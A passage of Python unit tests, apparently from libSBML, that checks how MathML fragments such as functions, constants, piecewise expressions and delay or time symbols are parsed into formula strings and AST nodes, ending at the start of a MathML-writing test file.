z = 1e300
z = z * z
return z - z
def util_PosInf():
z = 1e300
z = z * z
return z
def util_NegInf():
z = 1e300
z = z * z
return -z
def wrapString(s):
return s
pass
def MATHML_FOOTER():
return "</math>"
pass
def MATHML_HEADER():
return "<math xmlns='http://www.w3.org/1998/Math/MathML'>\n"
pass
def MATHML_HEADER_UNITS():
return "<math xmlns='http://www.w3.org/1998/Math/MathML'\n"
pass
def MATHML_HEADER_UNITS2():
return " xmlns:sbml='http://www.sbml.org/sbml/level3/version1/core'>\n"
pass
def XML_HEADER():
return "<?xml version='1.0' encoding='UTF-8'?>\n"
pass
def isnan(x):
return (x != x)
pass
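# wrapMathML/wrapMathMLUnits/wrapXML embed a MathML fragment in the XML
# header and <math> wrapper expected by libsbml.readMathMLFromString().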
def wrapMathML(s):
r = XML_HEADER()
r += MATHML_HEADER()
r += s
r += MATHML_FOOTER()
return r
pass
def wrapMathMLUnits(s):
r = XML_HEADER()
r += MATHML_HEADER_UNITS()
r += MATHML_HEADER_UNITS2()
r += s
r += MATHML_FOOTER()
return r
pass
def wrapXML(s):
r = XML_HEADER()
r += s
return r
pass
class TestReadMathML(unittest.TestCase):
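# Fixtures: N holds the ASTNode parsed from a MathML string, F the
# formula string produced from it by libsbml.formulaToString().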
F = None
N = None
def setUp(self):
self.N = None
self.F = None
pass
def tearDown(self):
self.N = None
self.F = None
pass
def test_element_abs(self):
s = wrapMathML("<apply><abs/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "abs(x)" == self.F ))
pass
def test_element_and(self):
s = wrapMathML("<apply> <and/> <ci>a</ci> <ci>b</ci> <ci>c</ci> </apply>"
)
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "and(a, b, c)" == self.F ))
pass
def test_element_arccos(self):
s = wrapMathML("<apply><arccos/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "acos(x)" == self.F ))
pass
def test_element_arccosh(self):
s = wrapMathML("<apply><arccosh/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "arccosh(x)" == self.F ))
pass
def test_element_arccot(self):
s = wrapMathML("<apply><arccot/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "arccot(x)" == self.F ))
pass
def test_element_arccoth(self):
s = wrapMathML("<apply><arccoth/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "arccoth(x)" == self.F ))
pass
def test_element_arccsc(self):
s = wrapMathML("<apply><arccsc/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "arccsc(x)" == self.F ))
pass
def test_element_arccsch(self):
s = wrapMathML("<apply><arccsch/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "arccsch(x)" == self.F ))
pass
def test_element_arcsec(self):
s = wrapMathML("<apply><arcsec/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "arcsec(x)" == self.F ))
pass
def test_element_arcsech(self):
s = wrapMathML("<apply><arcsech/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "arcsech(x)" == self.F ))
pass
def test_element_arcsin(self):
s = wrapMathML("<apply><arcsin/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "asin(x)" == self.F ))
pass
def test_element_arcsinh(self):
s = wrapMathML("<apply><arcsinh/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "arcsinh(x)" == self.F ))
pass
def test_element_arctan(self):
s = wrapMathML("<apply><arctan/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "atan(x)" == self.F ))
pass
def test_element_arctanh(self):
s = wrapMathML("<apply><arctanh/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "arctanh(x)" == self.F ))
pass
def test_element_bug_apply_ci_1(self):
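# Regression test: an <apply> whose operator is a plain <ci> must parse
# as a call to a user-defined function.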
s = wrapMathML("<apply>" +
" <ci> Y </ci>" +
" <cn> 1 </cn>" +
"</apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_FUNCTION )
self.assert_(( "Y" == self.N.getName() ))
self.assert_( self.N.getNumChildren() == 1 )
c = self.N.getLeftChild()
self.assert_( c != None )
self.assert_( c.getType() == libsbml.AST_REAL )
self.assert_( c.getReal() == 1 )
self.assert_( c.getNumChildren() == 0 )
pass
def test_element_bug_apply_ci_2(self):
s = wrapMathML("<apply>" +
" <ci> Y </ci>" +
" <csymbol encoding='text' " +
" definitionURL='http://www.sbml.org/sbml/symbols/time'> t </csymbol>" +
"</apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_FUNCTION )
self.assert_(( "Y" == self.N.getName() ))
self.assert_( self.N.getNumChildren() == 1 )
c = self.N.getLeftChild()
self.assert_( c != None )
self.assert_( c.getType() == libsbml.AST_NAME_TIME )
self.assert_(( "t" == c.getName() ))
self.assert_( c.getNumChildren() == 0 )
pass
def test_element_bug_cn_e_notation_1(self):
s = wrapMathML("<cn type='e-notation'> 2 <sep/> -8 </cn>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_REAL_E )
self.assert_( self.N.getMantissa() == 2.0 )
self.assert_( self.N.getExponent() == -8.0 )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_bug_cn_e_notation_2(self):
s = wrapMathML("<cn type='e-notation'> -3 <sep/> 4 </cn>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_REAL_E )
self.assert_( self.N.getMantissa() == -3.0 )
self.assert_( self.N.getExponent() == 4.0 )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_bug_cn_e_notation_3(self):
s = wrapMathML("<cn type='e-notation'> -6 <sep/> -1 </cn>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_REAL_E )
self.assert_( self.N.getMantissa() == -6.0 )
self.assert_( self.N.getExponent() == -1.0 )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_bug_cn_integer_negative(self):
s = wrapMathML("<cn type='integer'> -7 </cn>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_INTEGER )
self.assert_( self.N.getInteger() == -7 )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_bug_csymbol_1(self):
s = wrapMathML("<apply>" +
" <gt/>" +
" <csymbol encoding='text' " +
" definitionURL='http://www.sbml.org/sbml/symbols/time'>time</csymbol>" +
" <cn>5000</cn>" +
"</apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_RELATIONAL_GT )
self.assert_( self.N.getNumChildren() == 2 )
c = self.N.getLeftChild()
self.assert_( c != None )
self.assert_( c.getType() == libsbml.AST_NAME_TIME )
self.assert_(( "time" == c.getName() ))
self.assert_( c.getNumChildren() == 0 )
c = self.N.getRightChild()
self.assert_( c != None )
self.assert_( c.getType() == libsbml.AST_REAL )
self.assert_( c.getReal() == 5000 )
self.assert_( c.getNumChildren() == 0 )
pass
def test_element_bug_csymbol_delay_1(self):
s = wrapMathML("<apply>" +
" <csymbol encoding='text' definitionURL='http://www.sbml.org/sbml/" +
"symbols/delay'> my_delay </csymbol>" +
" <ci> x </ci>" +
" <cn> 0.1 </cn>" +
"</apply>\n")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_FUNCTION_DELAY )
self.assert_(( "my_delay" == self.N.getName() ))
self.assert_( self.N.getNumChildren() == 2 )
c = self.N.getLeftChild()
self.assert_( c != None )
self.assert_( c.getType() == libsbml.AST_NAME )
self.assert_(( "x" == c.getName() ))
self.assert_( c.getNumChildren() == 0 )
c = self.N.getRightChild()
self.assert_( c != None )
self.assert_( c.getType() == libsbml.AST_REAL )
self.assert_( c.getReal() == 0.1 )
self.assert_( c.getNumChildren() == 0 )
pass
def test_element_bug_math_xmlns(self):
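# Regression test: MathML must still be read when every element carries
# an explicit namespace prefix.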
s = wrapXML("<foo:math xmlns:foo='http://www.w3.org/1998/Math/MathML'>" +
" <foo:apply>" +
" <foo:plus/> <foo:cn>1</foo:cn> <foo:cn>2</foo:cn>" +
" </foo:apply>" +
"</foo:math>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "1 + 2" == self.F ))
pass
def test_element_ceiling(self):
s = wrapMathML("<apply><ceiling/><cn> 1.6 </cn></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "ceil(1.6)" == self.F ))
pass
def test_element_ci(self):
s = wrapMathML("<ci> x </ci>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_NAME )
self.assert_(( "x" == self.N.getName() ))
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_ci_definitionURL(self):
s = wrapMathML("<ci definitionURL=\"foobar\"> x </ci>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_NAME )
self.assert_(( "x" == self.N.getName() ))
self.assert_( self.N.getNumChildren() == 0 )
self.assert_( self.N.getDefinitionURL().getValue(0) == "foobar" )
pass
def test_element_ci_surrounding_spaces_bug(self):
s = wrapMathML(" <ci> s </ci> ")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_NAME )
self.assert_(( "s" == self.N.getName() ))
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_cn_default(self):
s = wrapMathML("<cn> 12345.7 </cn>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_REAL )
self.assert_( self.N.getReal() == 12345.7 )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_cn_e_notation(self):
s = wrapMathML("<cn type='e-notation'> 12.3 <sep/> 5 </cn>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_REAL_E )
self.assert_( self.N.getMantissa() == 12.3 )
self.assert_( self.N.getExponent() == 5 )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_cn_integer(self):
s = wrapMathML("<cn type='integer'> 12345 </cn>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_INTEGER )
self.assert_( self.N.getInteger() == 12345 )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_cn_rational(self):
s = wrapMathML("<cn type='rational'> 12342 <sep/> 2342342 </cn>"
)
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_RATIONAL )
self.assert_( self.N.getNumerator() == 12342 )
self.assert_( self.N.getDenominator() == 2342342 )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_cn_real(self):
s = wrapMathML("<cn type='real'> 12345.7 </cn>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_REAL )
self.assert_( self.N.getReal() == 12345.7 )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_cn_units(self):
s = wrapMathMLUnits("<cn sbml:units=\"mole\"> 12345.7 </cn>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_REAL )
self.assert_( self.N.getReal() == 12345.7 )
self.assert_( self.N.getUnits() == "mole" )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_constants_exponentiale(self):
s = wrapMathML("<exponentiale/>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_CONSTANT_E )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_constants_false(self):
s = wrapMathML("<false/>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_CONSTANT_FALSE )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_constants_infinity(self):
s = wrapMathML("<infinity/>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_REAL )
self.assert_( util_isInf(self.N.getReal()) == True )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_constants_notanumber(self):
s = wrapMathML("<notanumber/>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_REAL )
self.assertEqual( True, isnan(self.N.getReal()) )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_constants_pi(self):
s = wrapMathML("<pi/>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_CONSTANT_PI )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_constants_true(self):
s = wrapMathML("<true/>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_CONSTANT_TRUE )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_cos(self):
s = wrapMathML("<apply><cos/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "cos(x)" == self.F ))
pass
def test_element_cosh(self):
s = wrapMathML("<apply><cosh/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "cosh(x)" == self.F ))
pass
def test_element_cot(self):
s = wrapMathML("<apply><cot/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "cot(x)" == self.F ))
pass
def test_element_coth(self):
s = wrapMathML("<apply><coth/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "coth(x)" == self.F ))
pass
def test_element_csc(self):
s = wrapMathML("<apply><csc/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "csc(x)" == self.F ))
pass
def test_element_csch(self):
s = wrapMathML("<apply><csch/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "csch(x)" == self.F ))
pass
def test_element_csymbol_avogadro(self):
s = wrapMathML("<csymbol encoding='text' " + "definitionURL='http://www.sbml.org/sbml/symbols/avogadro'> NA </csymbol>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_NAME_AVOGADRO )
self.assert_(( "NA" == self.N.getName() ))
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_csymbol_delay_1(self):
s = wrapMathML("<csymbol encoding='text' " + "definitionURL='http://www.sbml.org/sbml/symbols/delay'> delay </csymbol>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_FUNCTION_DELAY )
self.assert_(( "delay" == self.N.getName() ))
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_csymbol_delay_2(self):
s = wrapMathML("<apply>" +
" <csymbol encoding='text' definitionURL='http://www.sbml.org/sbml/" +
"symbols/delay'> my_delay </csymbol>" +
" <ci> x </ci>" +
" <cn> 0.1 </cn>" +
"</apply>\n")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "my_delay(x, 0.1)" == self.F ))
pass
def test_element_csymbol_delay_3(self):
s = wrapMathML("<apply>" +
" <power/>" +
" <apply>" +
" <csymbol encoding='text' definitionURL='http://www.sbml.org/sbml/" +
"symbols/delay'> delay </csymbol>" +
" <ci> P </ci>" +
" <ci> delta_t </ci>" +
" </apply>\n" +
" <ci> q </ci>" +
"</apply>\n")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "pow(delay(P, delta_t), q)" == self.F ))
pass
def test_element_csymbol_time(self):
s = wrapMathML("<csymbol encoding='text' " + "definitionURL='http://www.sbml.org/sbml/symbols/time'> t </csymbol>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_NAME_TIME )
self.assert_(( "t" == self.N.getName() ))
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_eq(self):
s = wrapMathML("<apply> <eq/> <ci>a</ci> <ci>b</ci> <ci>c</ci> </apply>"
)
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "eq(a, b, c)" == self.F ))
pass
def test_element_exp(self):
s = wrapMathML("<apply><exp/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "exp(x)" == self.F ))
pass
def test_element_factorial(self):
s = wrapMathML("<apply><factorial/><cn> 5 </cn></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "factorial(5)" == self.F ))
pass
def test_element_floor(self):
s = wrapMathML("<apply><floor/><cn> 1.2 </cn></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "floor(1.2)" == self.F ))
pass
def test_element_function_call_1(self):
s = wrapMathML("<apply> <ci> foo </ci> <ci> x </ci> </apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "foo(x)" == self.F ))
pass
def test_element_function_call_2(self):
s = wrapMathML("<apply> <plus/> <cn> 1 </cn>" +
" <apply> <ci> f </ci> <ci> x </ci> </apply>" +
"</apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "1 + f(x)" == self.F ))
pass
def test_element_geq(self):
s = wrapMathML("<apply> <geq/> <cn>1</cn> <ci>x</ci> <cn>0</cn> </apply>"
)
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "geq(1, x, 0)" == self.F ))
pass
def test_element_gt(self):
s = wrapMathML("<apply> <gt/> <infinity/>" +
" <apply> <minus/> <infinity/> <cn>1</cn> </apply>" +
"</apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "gt(INF, INF - 1)" == self.F ))
pass
def test_element_invalid_mathml(self):
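# The reader must return None both for None input and for this
# malformed lambda construct.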
invalid = wrapMathML("<lambda definitionURL=\"http://biomodels.net/SBO/#SBO:0000065\">" +
"<bvar>" +
"<ci>c</ci>" +
"</bvar>" +
"<apply>" +
" <ci>c</ci>" +
"</apply>" +
"</lambda>\n")
self.N = libsbml.readMathMLFromString(None)
self.assert_( self.N == None )
self.N = libsbml.readMathMLFromString(invalid)
self.assert_( self.N == None )
pass
def test_element_lambda(self):
s = wrapMathML("<lambda>" +
" <bvar> <ci>x</ci> </bvar>" +
" <apply> <sin/>" +
" <apply> <plus/> <ci>x</ci> <cn>1</cn> </apply>" +
" </apply>" +
"</lambda>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "lambda(x, sin(x + 1))" == self.F ))
pass
def test_element_leq(self):
s = wrapMathML("<apply> <leq/> <cn>0</cn> <ci>x</ci> <cn>1</cn> </apply>"
)
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "leq(0, x, 1)" == self.F ))
pass
def test_element_ln(self):
s = wrapMathML("<apply><ln/><ci> a </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "log(a)" == self.F ))
pass
def test_element_log_1(self):
s = wrapMathML("<apply> <log/> <logbase> <cn type='integer'> 3 </cn> </logbase>" +
" <ci> x </ci>" +
"</apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "log(3, x)" == self.F ))
pass
def test_element_log_2(self):
s = wrapMathML("<apply> <log/> <ci> x </ci> </apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "log10(x)" == self.F ))
pass
def test_element_lt(self):
s = wrapMathML("<apply> <lt/> <apply> <minus/> <infinity/> <infinity/> </apply>" +
" <cn>1</cn>" +
"</apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "lt(INF - INF, 1)" == self.F ))
pass
def test_element_math(self):
s = wrapXML("<math xmlns='http://www.w3.org/1998/Math/MathML'/>"
)
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_UNKNOWN )
pass
def test_element_neq(self):
s = wrapMathML("<apply> <neq/> <notanumber/> <notanumber/> </apply>"
)
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "neq(NaN, NaN)" == self.F ))
pass
def test_element_not(self):
s = wrapMathML("<apply> <not/> <ci> TooShabby </ci> </apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "not(TooShabby)" == self.F ))
pass
def test_element_operator_plus(self):
s = wrapMathML("<apply> <plus/> <cn> 1 </cn> <cn> 2 </cn> <cn> 3 </cn> </apply>"
)
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "1 + 2 + 3" == self.F ))
pass
def test_element_operator_times(self):
s = wrapMathML("<apply> <times/> <ci> x </ci> <ci> y </ci> <ci> z </ci> </apply>"
)
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "x * y * z" == self.F ))
pass
def test_element_or(self):
s = wrapMathML("<apply> <or/> <ci>a</ci> <ci>b</ci> <ci>c</ci> <ci>d</ci> </apply>"
)
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "or(a, b, c, d)" == self.F ))
pass
def test_element_piecewise(self):
s = wrapMathML("<piecewise>" +
" <piece>" +
" <apply> <minus/> <ci>x</ci> </apply>" +
" <apply> <lt/> <ci>x</ci> <cn>0</cn> </apply>" +
" </piece>" +
" <piece>" +
" <cn>0</cn>" +
" <apply> <eq/> <ci>x</ci> <cn>0</cn> </apply>" +
" </piece>" +
" <piece>" +
" <ci>x</ci>" +
" <apply> <gt/> <ci>x</ci> <cn>0</cn> </apply>" +
" </piece>" +
"</piecewise>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "piecewise(-x, lt(x, 0), 0, eq(x, 0), x, gt(x, 0))" == self.F ))
pass
def test_element_piecewise_otherwise(self):
s = wrapMathML("<piecewise>" +
" <piece>" +
" <cn>0</cn>" +
" <apply> <lt/> <ci>x</ci> <cn>0</cn> </apply>" +
" </piece>" +
" <otherwise>" +
" <ci>x</ci>" +
" </otherwise>" +
"</piecewise>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "piecewise(0, lt(x, 0), x)" == self.F ))
pass
def test_element_power(self):
s = wrapMathML("<apply><power/> <ci>x</ci> <cn>3</cn> </apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "pow(x, 3)" == self.F ))
pass
def test_element_root_1(self):
s = wrapMathML("<apply> <root/> <degree> <cn type='integer'> 3 </cn> </degree>" +
" <ci> a </ci>" +
"</apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "root(3, a)" == self.F ))
pass
def test_element_root_2(self):
s = wrapMathML("<apply> <root/> <ci> a </ci> </apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "sqrt(a)" == self.F ))
pass
def test_element_sec(self):
s = wrapMathML("<apply><sec/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "sec(x)" == self.F ))
pass
def test_element_sech(self):
s = wrapMathML("<apply><sech/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "sech(x)" == self.F ))
pass
def test_element_sin(self):
s = wrapMathML("<apply><sin/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "sin(x)" == self.F ))
pass
def test_element_sinh(self):
s = wrapMathML("<apply><sinh/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "sinh(x)" == self.F ))
pass
def test_element_tan(self):
s = wrapMathML("<apply><tan/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "tan(x)" == self.F ))
pass
def test_element_tanh(self):
s = wrapMathML("<apply><tanh/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "tanh(x)" == self.F ))
pass
def test_element_xor(self):
s = wrapMathML("<apply> <xor/> <ci>a</ci> <ci>b</ci> <ci>b</ci> <ci>a</ci> </apply>"
)
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "xor(a, b, b, a)" == self.F ))
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestReadMathML))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/math/TestWriteMathML.py
```python
import sys
import unittest
import libsbml
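# Numeric helpers, as in TestReadMathML.py: IEEE-754 special values are
# produced by overflowing a large double.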
def util_NaN():
z = 1e300
z = z * z
return z - z
def util_PosInf():
z = 1e300
z = z * z
return z
def util_NegInf():
z = 1e300
z = z * z
return -z
def wrapString(s):
return s
pass
def MATHML_FOOTER():
return "</math>"
pass
def MATHML_HEADER():
return "<math xmlns=\"http://www.w3.org/1998/Math/MathML\">\n"
pass
def MATHML_HEADER_UNITS():
return "<math xmlns=\"http://www.w3.org/1998/Math/MathML\""
pass
def MATHML_HEADER_UNITS2():
return " xmlns:sbml=\"http://www.sbml.org/sbml/level3/version1/core\">\n"
pass
def XML_HEADER():
return "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
pass
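# wrapMathML/wrapMathMLUnits build the complete document expected from
# libsbml.writeMathMLToString() around a MathML fragment.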
def wrapMathML(s):
r = XML_HEADER()
r += MATHML_HEADER()
r += s
r += MATHML_FOOTER()
return r
pass
def wrapMathMLUnits(s):
r = XML_HEADER()
r += MATHML_HEADER_UNITS()
r += MATHML_HEADER_UNITS2()
r += s
r += MATHML_FOOTER()
return r
pass
class TestWriteMathML(unittest.TestCase):
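# Fixtures: N holds the ASTNode under test, S the MathML string produced
# from it by libsbml.writeMathMLToString().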
S = None
N = None
def equals(self, expected, actual):
# Direct string comparison of the expected MathML document against the
# string produced by libsbml.writeMathMLToString(); the generated
# single-argument variant relied on an undefined self.OSS and is unused.
return expected == actual
def setUp(self):
self.N = None
self.S = None
pass
def tearDown(self):
self.N = None
self.S = None
pass
def test_MathMLFormatter_ci(self):
